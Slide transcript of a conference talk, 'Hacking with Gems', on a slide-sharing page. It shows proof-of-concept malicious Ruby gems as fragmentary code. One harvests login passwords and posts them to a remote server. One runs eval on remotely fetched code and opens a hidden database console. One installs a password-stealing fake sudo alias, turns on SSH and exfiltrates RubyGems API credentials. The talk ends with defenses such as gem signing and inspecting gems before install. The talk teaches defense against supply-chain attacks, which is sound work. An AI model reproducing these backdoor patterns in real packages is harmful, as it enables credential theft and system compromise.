Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Hacking with Gems (denver.rb)
Search
Benjamin Smith
August 13, 2014
Technology
190
0
Share
Embed
Copy iframe code
Copy JS code
Copy link
Start on current slide
Hacking with Gems (denver.rb)
Benjamin Smith
August 13, 2014
More Decks by Benjamin Smith
See All by Benjamin Smith
Modules instead of Microservies
benjaminleesmith
0
120
Refactoring Rails Apps with Engines
benjaminleesmith
4
890
How I architected my big Rails app for success! (ConFoo 2014)
benjaminleesmith
1
270
Hacking with Gems (ConFoo 2014)
benjaminleesmith
1
150
How I architected my big Rails app for success! (RubyConfAU 2014)
benjaminleesmith
2
420
How I architected my big Rails app for success! (RMR 2013)
benjaminleesmith
4
420
Keeping Your Massive Rails App From Turning Into a S#!t Show (WindyCityRails 2013)
benjaminleesmith
1
290
Architecting your Rails app for success! (EuRuKo 2013)
benjaminleesmith
4
1.3k
Hacking with Gems (RuLu 2013)
benjaminleesmith
3
1.6k
Other Decks in Technology
See All in Technology
CSに"SLO"は要らない、経営層に"99.9%"は伝わらない - SREを全社に"翻訳"する3原則
cscengineer
PRO
0
2.8k
FinOps X 2026 Recap from Engineer Side #JapanFinOps
chacco38
0
260
スタートアップにおけるアジャイルの実践について #shibuyagile
murabayashi
3
2.1k
AIに障害切り分けを全部やってもらった。 。 。 。
estie
0
370
Amazon EVS で VCF 9.0 / 9.1 のサポート開始まとめ
mtoyoda
0
270
cccccc
moznion
0
1.8k
product engineering with qa
nealle
0
150
Text-to-SQLをAgentCoreで実現し、生成されるSQLの精度を定量的に評価する
yakumo
2
640
Oracle Exadata Database Service on Cloud@Customer X11M (ExaDB-C@C) サービス概要
oracle4engineer
PRO
2
8.3k
Claude Codeとハーネスについて考えてみる
oikon48
18
8.7k
キャリアの中で本を作る / Making a Book During Your Career
ak1210
0
110
Kotlin 開発のツラミを爆破した話! / Explode the difficulty of Kotlin dev!
eller86
0
150
Featured
See All Featured
Rebuilding a faster, lazier Slack
samanthasiow
85
9.6k
Have SEOs Ruined the Internet? - User Awareness of SEO in 2025
akashhashmi
0
380
YesSQL, Process and Tooling at Scale
rocio
174
15k
How to Build an AI Search Optimization Roadmap - Criteria and Steps to Take #SEOIRL
aleyda
1
2.1k
Performance Is Good for Brains [We Love Speed 2024]
tammyeverts
12
1.7k
Mobile First: as difficult as doing things right
swwweet
225
10k
The World Runs on Bad Software
bkeepers
PRO
72
12k
Everyday Curiosity
cassininazir
0
250
Agile that works and the tools we love
rasmusluckow
331
22k
We Are The Robots
honzajavorek
0
270
The #1 spot is gone: here's how to win anyway
tamaranovitovic
3
1.1k
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
47
8.2k
Transcript
Hacking with Gems Benjamin Smith @benjamin_smith
How to punk your friends with gems Benjamin Smith @benjamin_smith
How-to get rich quick and (maybe) not go to jail!
Benjamin Smith @benjamin_smith
Four reasons you should NOT trust Benjamin Smith @benjamin_smith
None
who i am
who i am
who i am
what i am NOT
None
please do not try this at home
please do not try this at home
None
None
Lawful Evil Lawful Good
Lawful Evil Lawful Good
Lawful Evil Lawful Good
Lawful Evil Lawful Good
once upon a time
GEM remote: https://rubygems.org/ specs: actionmailer (4.1.4) actionpack (= 4.1.4) actionview
(= 4.1.4) mail (~> 2.5.4) actionpack (4.1.4) actionview (= 4.1.4) activesupport (= 4.1.4) rack (~> 1.5.2)
what’s the worst that could happen?
None
gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages
before... github.com/benjaminleesmith/awesome-rails-flash-messages
after! github.com/benjaminleesmith/awesome-rails-flash-messages
some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages
... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages
?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages
i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages
i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages
“development.log” ... "user"=>{"email"=>"
[email protected]
", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages
elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages
profit • Step 1: do something • Step 2: do
something else • Step 3: ???? • Step 4: profit
profit • Step 1: write a gem that does something
• Step 2: • Step 3: • Step 4:
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: • Step 4:
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit
profit • Step 1: write a gem that does something
• Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country
a one way ticket to
that was easy. what else can I do?
gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector
show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V
+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector
how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)
self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector
...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if
params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector
/users/sign_in github.com/benjaminleesmith/net_http_detector
/users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector
hello db access! github.com/benjaminleesmith/net_http_detector
SELECT * FROM users; github.com/benjaminleesmith/net_http_detector
UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector
CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector
careful of wolves in sheep’s clothing
profit • Step 1: • Step 2: • Step 3:
• Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: • Step 3: • Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:
profit • Step 1: write a gem that does something
• Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country
i like the beach
that was easy. what else can I do?
gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s
what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1
Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s
None
what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s
better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0
8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s
behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar
-zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s
what what github.com/benjaminleesmith/better_date_to_s
i can haz source github.com/benjaminleesmith/better_date_to_s
truth time • this gem doesn't actually work • but
it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s
so much code so little time • Step 1: write
a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country
that was easy hard. what else can I do? (that's
easier)
gem install bunlder
gem install be_truthy github.com/benjaminleesmith/be_truthy
what it does > true.should be_true > User.new.should be_true >
User.new.should be_truthy github.com/benjaminleesmith/be_truthy
what it ACTUALLY does github.com/benjaminleesmith/be_truthy
github.com/benjaminleesmith/be_truthy
file tree looks ok github.com/benjaminleesmith/be_truthy
source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy
but what was this? github.com/benjaminleesmith/be_truthy
I see no C github.com/benjaminleesmith/be_truthy
run the what file? Gem::Specification.new do |gem| ... gem.extensions =
["Rakefile"] ... end github.com/benjaminleesmith/be_truthy
there is no Rakefile github.com/benjaminleesmith/be_truthy
the real file tree github.com/benjaminleesmith/be_truthy
the real file tree github.com/benjaminleesmith/be_truthy
what does the Rakefile do? github.com/benjaminleesmith/be_truthy
sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy
File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy
FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy
what does "sudo" do now? github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
print "WARNING: Improper use of the sudo command ..." system
"stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy
echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy
/usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .
-passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy
Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy
ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy
take away: don't install ben's gems
None
how could I get you to install my gems?
what gems are trustworthy?
how can I add my code to already trusted gems?
back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip
).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy
gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`
Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem
now I own your gems github.com/benjaminleesmith/be_truthy
> git clone your-gem-repo ...add a little code... > rake
build > gem push your-gem github.com/benjaminleesmith/be_truthy
do people trust your gems?
do people who install your gems have trustworthy gems?
None
there’s still one problem
bootstrapping
being popular sucks
conferences
social engineering
None
None
None
so what happens now?
ruby gems goes down
heroku deploys go down
i go to the beach
ruby gems goes down
heroku deploys go down
recovery
so what now?
gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages
Little Snitch obdev.at/products/littlesnitch/index.html
gem install be_truthy github.com/benjaminleesmith/be_truthy
fseventer fernlightning.com/doku.php?id=software:fseventer:start
don’t “gem install” from strangers
gem fetch vs gem install > gem fetch be_truthy >
gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy
None
None
curl -sSL https://get.rvm.io | bash
gem install rails -P HighSecurity
> gem install rails -P HighSecurity Fetching: i18n-0.6.11.gem (100%) ERROR:
While executing gem ... (Gem::Security::Exception) unsigned gems are not allowed by the High Security policy
gem cert --build
https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-1.html http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-2.html
sandboxing
github.com/rubygems/rubygems
tools to detect malicious code
private gem repos
do not try this at home
don't install gems you don't need to
pay attention to what your gems do
monitor your system
read the source
gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary
on install github.com/benjaminleesmith/coal-mine-canary
the results github.com/benjaminleesmith/coal-mine-canary
thank you!
questions? ideas? @benjamin_smith https://github.com/benjaminleesmith
questions? ideas? @benjamin_smith https://github.com/benjaminleesmith
questions? ideas? @benjamin_smith https://github.com/benjaminleesmith